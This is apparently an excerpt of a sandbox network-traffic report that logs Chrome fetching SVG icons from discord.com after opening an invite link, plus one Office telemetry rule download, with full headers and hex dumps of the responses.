                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC395INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 2e 39 39 33 32 20 37 2e 34 39 37 32 37 43 35 2e 34 38 30 37 33 20 37 2e 34 39 37 32 37 20 37 2e 34 39 37 32 37 20 35 2e 34 38 30 37 33 20 37 2e 34 39 37 32 37 20 32 2e 39 39 33 32 43 37 2e 34 39 37 32 37 20 31 2e 38 34 34 32 31 20 37 2e 30 36 37 30 34 20 30 2e 37 39 35 37 30 38 20 36 2e 33 35 38 38 39 20 30 43 39 2e 35 30 35 39 35 20 30 2e 31 38 38 33 32 33 20 31 32 20 32 2e 38 30 30 31 38 20 31 32 20 35 2e 39 39 34 35 36 43 31 32 20 39 2e
                                                                                                                                                                                                                                                                                    Data Ascii: <svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    129192.168.2.549852162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1385OUTGET /assets/9017b7062734e72bb476.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC958INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 688
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d10c5d121879-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "c6ce0010471b65c0faeda6c53ab297bd"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:48 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DfGdw5nyYGQG5ZAWWqzOF6OD1kLkTJK7u9Tor590dHm1go1PrYupHbECIEbCAULkU%2FGUNu1S6%2BqRBd6jAPGYcKMOJFuR909omZid0NVr%2BfsKWQar0zJE3k0Zcy9z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC411INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 20 31 32 22 20 77 69 64 74 68 3d 22 31 33 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 35 2e 33 39 30 31 31 2e 35 34 30 30 32 37 63 2e 33 35 35 33 36 2d 2e 37 32 30 30 33 37 20 31 2e 33 38 32 31 31 2d 2e 37 32 30 30 33 36 20 31 2e 37 33 37 34 37 2e 30 30 30 30 30 32 6c 31 2e 31 38 33 35 39 20 32 2e 33 39 38 32 30 31 63 2e 31 34 31 31 31 2e 32 38 35 39 33 2e 34 31 33 38 38 2e 34 38 34 31 31 2e 37 32 39 34 32 2e 35 32 39 39 36 6c 32 2e 36 34 36 36 31 2e 33 38 34 35 37 63 2e 37 39 34 36 2e 31 31 35 34 36 20 31 2e 31 31 31 39 20 31 2e
                                                                                                                                                                                                                                                                                    Data Ascii: <svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.1119 1.
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC277INData Raw: 2e 36 31 39 34 2d 2e 31 34 38 34 2d 2e 39 30 31 36 32 20 30 6c 2d 32 2e 33 36 37 31 37 20 31 2e 32 34 34 35 63 2d 2e 37 31 30 37 32 2e 33 37 33 36 2d 31 2e 35 34 31 33 38 2d 2e 32 32 39 39 2d 31 2e 34 30 35 36 35 2d 31 2e 30 32 31 33 6c 2e 34 35 32 30 39 2d 32 2e 36 33 35 38 37 63 2e 30 35 33 39 2d 2e 33 31 34 32 37 2d 2e 30 35 30 32 39 2d 2e 36 33 34 39 33 2d 2e 32 37 38 36 31 2d 2e 38 35 37 35 6c 2d 31 2e 39 31 35 30 38 33 2d 31 2e 38 36 36 37 34 63 2d 2e 35 37 34 39 38 34 2d 2e 35 36 30 34 37 2d 2e 32 35 37 36 39 39 38 2d 31 2e 35 33 36 39 37 2e 35 33 36 39 30 38 2d 31 2e 36 35 32 34 33 6c 32 2e 36 34 36 35 37 35 2d 2e 33 38 34 35 37 63 2e 33 31 35 35 34 2d 2e 30 34 35 38 35 2e 35 38 38 33 31 2d 2e 32 34 34 30 33 2e 37 32 39 34 33 2d 2e 35 32 39 39 36
                                                                                                                                                                                                                                                                                    Data Ascii: .6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c.0539-.31427-.05029-.63493-.27861-.8575l-1.915083-1.86674c-.574984-.56047-.2576998-1.53697.536908-1.65243l2.646575-.38457c.31554-.04585.58831-.24403.72943-.52996


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    130192.168.2.549851162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1385OUTGET /assets/af5116b1db004acbdb8b.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 137
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d10c6bb3422f-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "70275fe3104cf1d3388586ad8ffd478e"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:52 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCXkRgNvRrSKo6fKGvMwOxsge3PWbG96s63ifo%2F5FQjGh1%2BU5ySkFfnx%2FbSrBUGqoEsTB7WiHggwtjLMhB3BCRWJiR%2FyS7PVzivvv5rzssVRkDrOIs2iltZ8Bc23"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC137INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 39 20 38 22 20 77 69 64 74 68 3d 22 39 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 34 2e 35 20 30 20 34 2e 35 20 38 68 2d 39 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                                    Data Ascii: <svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    131192.168.2.54985013.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 485
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 352ee399-f01e-0052-6b36-3d9224000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201252Z-174c587ffdf9xbcchC1TEBxkz400000003bg000000002cnp
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    132192.168.2.549857162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1385OUTGET /assets/ba88bbd1342d3f000e33.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC959INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 3146
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d10eca50c407-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "81084ff5a27b6e6ff487e479c37d1660"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:42 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qSnT%2Bh1dY39hJCNLR4TKI8MdIxCeGnsCjqAedjx8R5Ssq2Jr8c1LQlzS4MhNOiVHSDz3TnO9OBDGj1ynEVGnPBWPEp5Apot%2BrzrG8AS5U8r0hPM83Y%2B2NDW8BoFr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC410INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 39 30 20 35 39 2e 31 39 22 3e 0a 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 36 61 39 34 66 66 7d 2e 63 6c 73 2d 32 7b 66 69 6c 6c 3a 23 61 39 63 37 66 66 7d 2e 63 6c 73 2d 33 7b 66 69 6c 6c 3a 23 32 30 32 32 32 35 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 64 65 66 73 3e 0a 20 20 3c 67 20 69 64 3d 22 e5 9b be e5 b1 82 5f 32 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 e5 9b be e5 b1 82 20 32 22 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22
                                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19"> <defs> <style> .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225} </style> </defs> <g id="_2" data-name=" 2"> <g id="Layer_1" data-name="Layer 1"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 32 61 38 2e 35 35 20 38 2e 35 35 20 30 20 30 20 31 2d 35 2e 35 31 2d 32 2e 31 33 63 2d 2e 31 32 2d 2e 31 31 2d 2e 32 34 2d 2e 32 32 2d 2e 33 34 2d 2e 33 33 6c 2d 31 32 2e 36 36 20 35 2e 31 33 61 31 32 2e 34 32 20 31 32 2e 34 32 20 30 20 30 20 30 2d 36 2e 39 20 31 36 6c 2d 35 20 32 41 35 2e 35 32 20 35 2e 35 32 20 30 20 30 20 30 20 2e 34 20 34 32 2e 36 31 6c 34 2e 36 37 20 31 31 2e 35 31 61 35 2e 35 31 20 35 2e 35 31 20 30 20 30 20 30 20 37 2e 31 38 20 33 6c 35 2e 36 34 2d 32 2e 32 38 41 31 32 2e 34 33 20 31 32 2e 34 33 20 30 20 30 20 30 20 33 32 20 35 38 2e 32 38 6c 34 30 2e 35 34 2d 31 36 2e 34 34 61 31 32 2e 34 33 20 31 32 2e 34 33 20 30 20 30 20 30 20 37 2e 37 33 2d 31 32 2e 32 32 6c 36 2e 32 38 2d 32 2e 35 34 61 35 2e 35 32 20 35 2e 35 32 20 30 20 30
                                                                                                                                                                                                                                                                                    Data Ascii: 2a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.52 5.52 0 0 0 .4 42.61l4.67 11.51a5.51 5.51 0 0 0 7.18 3l5.64-2.28A12.43 12.43 0 0 0 32 58.28l40.54-16.44a12.43 12.43 0 0 0 7.73-12.22l6.28-2.54a5.52 5.52 0 0
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1367INData Raw: 35 20 38 2e 35 35 20 30 20 30 20 31 2d 35 2e 35 31 2d 32 2e 31 33 63 2d 2e 31 32 2d 2e 31 31 2d 2e 32 34 2d 2e 32 32 2d 2e 33 34 2d 2e 33 33 5a 4d 35 35 2e 36 39 20 33 38 2e 30 35 6c 2d 31 31 2e 37 37 20 34 2e 37 37 41 31 30 2e 36 31 20 31 30 2e 36 31 20 30 20 30 20 31 20 33 30 2e 31 31 20 33 37 6c 2d 33 2e 33 33 2d 38 2e 32 33 41 34 20 34 20 30 20 30 20 31 20 32 39 20 32 33 2e 35 36 6c 32 33 2e 33 31 2d 39 2e 34 34 61 34 20 34 20 30 20 30 20 31 20 35 2e 31 38 20 32 2e 31 39 6c 33 2e 36 33 20 39 61 39 2e 38 20 39 2e 38 20 30 20 30 20 31 2d 35 2e 34 33 20 31 32 2e 37 34 5a 4d 36 37 2e 34 39 20 32 31 61 33 2e 37 33 20 33 2e 37 33 20 30 20 31 20 31 20 32 2e 30 35 2d 34 2e 38 35 41 33 2e 37 32 20 33 2e 37 32 20 30 20 30 20 31 20 36 37 2e 34 39 20 32 31 5a 22
                                                                                                                                                                                                                                                                                    Data Ascii: 5 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33ZM55.69 38.05l-11.77 4.77A10.61 10.61 0 0 1 30.11 37l-3.33-8.23A4 4 0 0 1 29 23.56l23.31-9.44a4 4 0 0 1 5.18 2.19l3.63 9a9.8 9.8 0 0 1-5.43 12.74ZM67.49 21a3.73 3.73 0 1 1 2.05-4.85A3.72 3.72 0 0 1 67.49 21Z"


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    133192.168.2.549858162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC673OUTGET /assets/822c37e354b4a39dd6ca.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
